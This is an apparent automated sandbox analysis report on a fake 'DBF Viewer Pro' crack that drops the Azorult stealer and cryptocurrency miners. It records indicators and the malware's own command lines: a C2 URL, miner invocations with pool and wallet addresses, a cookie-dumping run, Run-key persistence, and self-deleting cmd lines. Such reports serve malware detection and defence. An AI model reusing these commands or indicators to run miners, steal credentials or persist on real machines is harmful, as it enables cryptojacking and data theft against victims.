Analysis
max time kernel: 1575s
max time network: 1800s
platform: windows10_x64
resource: win10v20201028
submitted: 02-04-2021 13:29

Static task: static1
Behavioral task: behavioral1 | Sample: DBF.Viewer.Pro.3.11.crack.by.F4CG.exe | Resource: win10v20201028
Behavioral task: behavioral2 | Sample: DBF.Viewer.Pro.3.11.crack.by.F4CG.exe | Resource: win10v20201028
Behavioral task: behavioral3 | Sample: DBF.Viewer.Pro.3.11.crack.by.F4CG.exe | Resource: win10v20201028
Behavioral task: behavioral4 | Sample: DBF.Viewer.Pro.3.11.crack.by.F4CG.exe | Resource: win10v20201028
Behavioral task: behavioral5 | Sample: DBF.Viewer.Pro.3.11.crack.by.F4CG.exe | Resource: win7v20201028
General
Target: DBF.Viewer.Pro.3.11.crack.by.F4CG.exe
Size: 4.8MB
MD5: 98e0552e7c661d3f84c5ca691bb58b60
SHA1: f8747cbd9256e9587e45b1feeded6b082b098e5d
SHA256: 23e30d6f1d505e6a0cf1672ec7420d28af81975a9832f1af2eae8a3233a09eb4
SHA512: d767b09e6d24ce96ce95e7cbcb248b93373f7dcbad3a96ba249a3c54df9511567c4ff2bfd8393492a0f90ae8bf5ab37c1cf71f75092ad81dde7a7a7a5f7e76da
Malware Config
Extracted
Family: azorult
C2: http://kvaka.li/1210776429.php
Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.

XMRig Miner Payload (4 IoCs)
resource | yara_rule
behavioral4/memory/5000-89-0x0000000140000000-0x000000014070A000-memory.dmp | xmrig
behavioral4/memory/5000-90-0x00000001402CA898-mapping.dmp | xmrig
behavioral4/memory/5000-93-0x0000000140000000-0x000000014070A000-memory.dmp | xmrig
behavioral4/memory/5000-94-0x0000000140000000-0x000000014070A000-memory.dmp | xmrig

Blocklisted process makes network request (1 IoC)
flow | pid | Process
67 | 5000 | msiexec.exe

Executes dropped EXE (30 IoCs)
pid | Process
4068 | keygen-pr.exe
4044 | keygen-step-1.exe
2056 | keygen-step-3.exe
4512 | keygen-step-4.exe
1460 | key.exe
1768 | Setup.exe
4640 | setups.exe
4256 | askinstall20.exe
188 | setups.tmp
1240 | file.exe
4440 | 7758.tmp.exe
1908 | 77E6.tmp.exe
2264 | 7893.tmp.exe
2432 | md2_2efs.exe
4652 | 7758.tmp.exe
5116 | BTRSetp.exe
4744 | 8441342.exe
4740 | 5684678.exe
3640 | 8568804.exe
3860 | 2928718.exe
3144 | 5342057.exe
4024 | gcttt.exe
372 | Windows Host.exe
216 | jfiag3g_gg.exe
4620 | jfiag3g_gg.exe
2668 | 8568804.exe
4796 | 8568804.exe
4716 | 2928718.exe
1800 | jfiag3g_gg.exe
96 | jfiag3g_gg.exe

Checks computer location settings (2 TTPs, 1 IoC)
Looks up the country code configured in the registry, likely for geofencing.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation | setups.tmp

Loads dropped DLL (7 IoCs)
pid | Process
188 | setups.tmp
188 | setups.tmp
188 | setups.tmp
188 | setups.tmp
188 | setups.tmp
188 | setups.tmp
188 | setups.tmp

Reads local data of messenger clients (2 TTPs)
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials.

Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

Adds Run key to start application (2 TTPs, 4 IoCs)
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | 77E6.tmp.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\wwwupdat3 = "C:\\Users\\Admin\\AppData\\Roaming\\wwwupdat3.exe" | 77E6.tmp.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host = "C:\\ProgramData\\Windows Host\\Windows Host.exe" | 5684678.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe" | gcttt.exe

Checks installed software on the system (1 TTP)
Looks up Uninstall key entries in the registry to enumerate software on the system.

description | ioc | Process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | md2_2efs.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTP)

Looks up external IP address via web service (2 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
62 | api.ipify.org
119 | ip-api.com

Suspicious use of SetThreadContext (5 IoCs)
description | pid | Process | procid_target
PID 4440 set thread context of 4652 | 4440 | 7758.tmp.exe | 108
PID 1908 set thread context of 4676 | 1908 | 77E6.tmp.exe | 110
PID 1908 set thread context of 5000 | 1908 | 77E6.tmp.exe | 113
PID 3640 set thread context of 4796 | 3640 | 8568804.exe | 133
PID 3860 set thread context of 4716 | 3860 | 2928718.exe | 134

Drops file in Windows directory (3 IoCs)
description | ioc | Process
File opened for modification | C:\Windows\Debug\ESE.TXT | MicrosoftEdge.exe
File opened for modification | C:\Windows\Debug\ESE.TXT | MicrosoftEdge.exe
File opened for modification | C:\Windows\Debug\ESE.TXT | MicrosoftEdge.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Checks processor information in registry (2 TTPs, 2 IoCs)
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | 7758.tmp.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | 7758.tmp.exe

Delays execution with timeout.exe (1 IoC)
pid | Process
4408 | timeout.exe

Kills process with taskkill (1 IoC)
pid | Process
1080 | taskkill.exe

description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main | MicrosoftEdgeCP.exe
Key created | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main | browser_broker.exe
Key created | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main | browser_broker.exe

Modifies registry class (64 IoCs)
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | askinstall20.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = … | askinstall20.exe
Runs ping.exe (1 TTP, 2 IoCs)
pid | Process
2456 | PING.EXE
4028 | PING.EXE

Suspicious behavior: EnumeratesProcesses (31 IoCs)
pid | Process
188 | setups.tmp
188 | setups.tmp
4652 | 7758.tmp.exe
4652 | 7758.tmp.exe
4744 | 8441342.exe
4744 | 8441342.exe
4744 | 8441342.exe
3144 | 5342057.exe
3144 | 5342057.exe
4620 | jfiag3g_gg.exe
4620 | jfiag3g_gg.exe
3640 | 8568804.exe
3640 | 8568804.exe
4796 | 8568804.exe
4796 | 8568804.exe
4716 | 2928718.exe
4716 | 2928718.exe
188 | setups.tmp
188 | setups.tmp
188 | setups.tmp
188 | setups.tmp
1800 | jfiag3g_gg.exe
1800 | jfiag3g_gg.exe
188 | setups.tmp
188 | setups.tmp
188 | setups.tmp
188 | setups.tmp
96 | jfiag3g_gg.exe
96 | jfiag3g_gg.exe
188 | setups.tmp
188 | setups.tmp

Suspicious behavior: MapViewOfSection (10 IoCs)
pid | Process
4468 | MicrosoftEdgeCP.exe
4468 | MicrosoftEdgeCP.exe
4468 | MicrosoftEdgeCP.exe
4468 | MicrosoftEdgeCP.exe
4176 | MicrosoftEdgeCP.exe
4176 | MicrosoftEdgeCP.exe
4176 | MicrosoftEdgeCP.exe
4176 | MicrosoftEdgeCP.exe
4176 | MicrosoftEdgeCP.exe
4176 | MicrosoftEdgeCP.exe

Suspicious use of AdjustPrivilegeToken (64 IoCs)
Suspicious use of SetWindowsHookEx (11 IoCs)
pid | Process
4640 | setups.exe
188 | setups.tmp
3400 | MicrosoftEdge.exe
4468 | MicrosoftEdgeCP.exe
4468 | MicrosoftEdgeCP.exe
3452 | MicrosoftEdge.exe
1224 | MicrosoftEdgeCP.exe
1224 | MicrosoftEdgeCP.exe
4728 | MicrosoftEdge.exe
4176 | MicrosoftEdgeCP.exe
4176 | MicrosoftEdgeCP.exe

Suspicious use of WriteProcessMemory (64 IoCs)
Processes
-
Process tree (indentation shows parent/child depth; each entry gives the image path, the command line as recorded, and the signatures hit by that process):

- PID 4684: C:\Users\Admin\AppData\Local\Temp\DBF.Viewer.Pro.3.11.crack.by.F4CG.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\DBF.Viewer.Pro.3.11.crack.by.F4CG.exe"
  Signatures: Suspicious use of WriteProcessMemory
    - PID 3892: C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
      Signatures: Suspicious use of WriteProcessMemory
        - PID 4068: C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
          Command line: keygen-pr.exe -p83fsase3Ge
          Signatures: Executes dropped EXE; Suspicious use of WriteProcessMemory
            - PID 1460: C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
              Command line: "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
              Signatures: Executes dropped EXE; Suspicious use of WriteProcessMemory
                - PID 2212: C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                  Command line: C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
        - PID 4044: C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
          Command line: keygen-step-1.exe
          Signatures: Executes dropped EXE
        - PID 2056: C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
          Command line: keygen-step-3.exe
          Signatures: Executes dropped EXE; Suspicious use of WriteProcessMemory
            - PID 2292: C:\Windows\SysWOW64\cmd.exe
              Command line: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
              Signatures: Suspicious use of WriteProcessMemory
                - PID 2456: C:\Windows\SysWOW64\PING.EXE
                  Command line: ping 1.1.1.1 -n 1 -w 3000
                  Signatures: Runs ping.exe
        - PID 4512: C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
          Command line: keygen-step-4.exe
          Signatures: Executes dropped EXE; Suspicious use of WriteProcessMemory
            - PID 1768: C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
              Command line: "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
              Signatures: Executes dropped EXE; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
                - PID 4640: C:\Users\Admin\AppData\Local\Temp\FRNAARQMSF\setups.exe
                  Command line: "C:\Users\Admin\AppData\Local\Temp\FRNAARQMSF\setups.exe" ll
                  Signatures: Executes dropped EXE; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
                    - PID 188: C:\Users\Admin\AppData\Local\Temp\is-LLIL5.tmp\setups.tmp
                      Command line: "C:\Users\Admin\AppData\Local\Temp\is-LLIL5.tmp\setups.tmp" /SL5="$701D0,635399,250368,C:\Users\Admin\AppData\Local\Temp\FRNAARQMSF\setups.exe" ll
                      Signatures: Executes dropped EXE; Checks computer location settings; Loads dropped DLL; Suspicious behavior: EnumeratesProcesses; Suspicious use of SetWindowsHookEx
            - PID 4256: C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
              Command line: "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
              Signatures: Executes dropped EXE; Modifies system certificate store; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
                - PID 3916: C:\Windows\SysWOW64\cmd.exe
                  Command line: cmd.exe /c taskkill /f /im chrome.exe
                  Signatures: Suspicious use of WriteProcessMemory
                    - PID 1080: C:\Windows\SysWOW64\taskkill.exe
                      Command line: taskkill /f /im chrome.exe
                      Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
            - PID 1240: C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
              Command line: "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
              Signatures: Executes dropped EXE; Suspicious use of WriteProcessMemory
                - PID 4440: C:\Users\Admin\AppData\Roaming\7758.tmp.exe
                  Command line: "C:\Users\Admin\AppData\Roaming\7758.tmp.exe"
                  Signatures: Executes dropped EXE; Suspicious use of SetThreadContext; Suspicious use of WriteProcessMemory
                    - PID 4652: C:\Users\Admin\AppData\Roaming\7758.tmp.exe
                      Command line: "C:\Users\Admin\AppData\Roaming\7758.tmp.exe"
                      Signatures: Executes dropped EXE; Checks processor information in registry; Suspicious behavior: EnumeratesProcesses
                - PID 1908: C:\Users\Admin\AppData\Roaming\77E6.tmp.exe
                  Command line: "C:\Users\Admin\AppData\Roaming\77E6.tmp.exe"
                  Signatures: Executes dropped EXE; Adds Run key to start application; Suspicious use of SetThreadContext
                    - PID 4676: C:\Windows\system32\msiexec.exe
                      Command line: -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                    - PID 5000: C:\Windows\system32\msiexec.exe
                      Command line: -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
                      Signatures: Blocklisted process makes network request; Suspicious use of AdjustPrivilegeToken
                - PID 2264: C:\Users\Admin\AppData\Roaming\7893.tmp.exe
                  Command line: "C:\Users\Admin\AppData\Roaming\7893.tmp.exe"
                  Signatures: Executes dropped EXE
                    - PID 1940: C:\Windows\SysWOW64\cmd.exe
                      Command line: /c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\7893.tmp.exe
                        - PID 4408: C:\Windows\SysWOW64\timeout.exe
                          Command line: timeout /t 3
                          Signatures: Delays execution with timeout.exe
                - PID 2452: C:\Windows\SysWOW64\cmd.exe
                  Command line: "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
                    - PID 4028: C:\Windows\SysWOW64\PING.EXE
                      Command line: ping 127.0.0.1
                      Signatures: Runs ping.exe
            - PID 2432: C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe
              Command line: "C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"
              Signatures: Executes dropped EXE; Checks whether UAC is enabled; Suspicious use of AdjustPrivilegeToken
            - PID 5116: C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe
              Command line: "C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"
              Signatures: Executes dropped EXE; Suspicious use of AdjustPrivilegeToken
                - PID 4744: C:\ProgramData\8441342.exe
                  Command line: "C:\ProgramData\8441342.exe"
                  Signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
                - PID 4740: C:\ProgramData\5684678.exe
                  Command line: "C:\ProgramData\5684678.exe"
                  Signatures: Executes dropped EXE; Adds Run key to start application
                    - PID 372: C:\ProgramData\Windows Host\Windows Host.exe
                      Command line: "C:\ProgramData\Windows Host\Windows Host.exe"
                      Signatures: Executes dropped EXE
                - PID 3640: C:\ProgramData\8568804.exe
                  Command line: "C:\ProgramData\8568804.exe"
                  Signatures: Executes dropped EXE; Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
                    - PID 2668: C:\ProgramData\8568804.exe
                      Command line: "{path}"
                      Signatures: Executes dropped EXE
                    - PID 4796: C:\ProgramData\8568804.exe
                      Command line: "{path}"
                      Signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
                - PID 3860: C:\ProgramData\2928718.exe
                  Command line: "C:\ProgramData\2928718.exe"
                  Signatures: Executes dropped EXE; Suspicious use of SetThreadContext; Suspicious use of AdjustPrivilegeToken
                    - PID 4716: C:\ProgramData\2928718.exe
                      Command line: "{path}"
                      Signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
                - PID 3144: C:\ProgramData\5342057.exe
                  Command line: "C:\ProgramData\5342057.exe"
                  Signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
            - PID 4024: C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe
              Command line: "C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"
              Signatures: Executes dropped EXE; Adds Run key to start application
                - PID 216: C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                  Command line: C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                  Signatures: Executes dropped EXE
                - PID 4620: C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                  Command line: C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                  Signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses
                - PID 1800: C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                  Command line: C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                  Signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses
                - PID 96: C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                  Command line: C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                  Signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses
- PID 3400: C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
  Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
  Signatures: Drops file in Windows directory; Modifies Internet Explorer settings; Modifies registry class; Suspicious use of AdjustPrivilegeToken; Suspicious use of SetWindowsHookEx
- PID 4200: C:\Windows\system32\browser_broker.exe
  Command line: C:\Windows\system32\browser_broker.exe -Embedding
  Signatures: Modifies Internet Explorer settings
- PID 4468: C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  Signatures: Modifies registry class; Suspicious behavior: MapViewOfSection; Suspicious use of SetWindowsHookEx
- PID 1212: C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  Signatures: Modifies Internet Explorer settings; Modifies registry class; Suspicious use of AdjustPrivilegeToken
- PID 3140: C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  Signatures: Modifies registry class; Suspicious use of AdjustPrivilegeToken
- PID 3484: C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  Signatures: Modifies registry class
- PID 4804: C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
- PID 4108: C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  Signatures: Modifies registry class
- PID 4624: C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  Signatures: Modifies registry class
- PID 3452: C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
  Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
  Signatures: Drops file in Windows directory; Modifies registry class; Suspicious use of SetWindowsHookEx
- PID 4752: C:\Windows\system32\browser_broker.exe
  Command line: C:\Windows\system32\browser_broker.exe -Embedding
- PID 1224: C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  Signatures: Modifies registry class; Suspicious use of SetWindowsHookEx
- PID 1648: C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  Signatures: Modifies registry class
- PID 4728: C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
  Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
  Signatures: Drops file in Windows directory; Modifies registry class; Suspicious use of SetWindowsHookEx
- PID 3772: C:\Windows\system32\browser_broker.exe
  Command line: C:\Windows\system32\browser_broker.exe -Embedding
  Signatures: Modifies Internet Explorer settings
- PID 4176: C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  Signatures: Suspicious behavior: MapViewOfSection; Suspicious use of SetWindowsHookEx
- PID 4320: C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  Signatures: Modifies registry class
- PID 1096: C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
- PID 1432: C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  Signatures: Modifies registry class
- PID 332: C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  Signatures: Modifies registry class; Suspicious use of AdjustPrivilegeToken
- PID 2764: C:\Windows\system32\AUDIODG.EXE
  Command line: C:\Windows\system32\AUDIODG.EXE 0xf8
  Signatures: Suspicious use of AdjustPrivilegeToken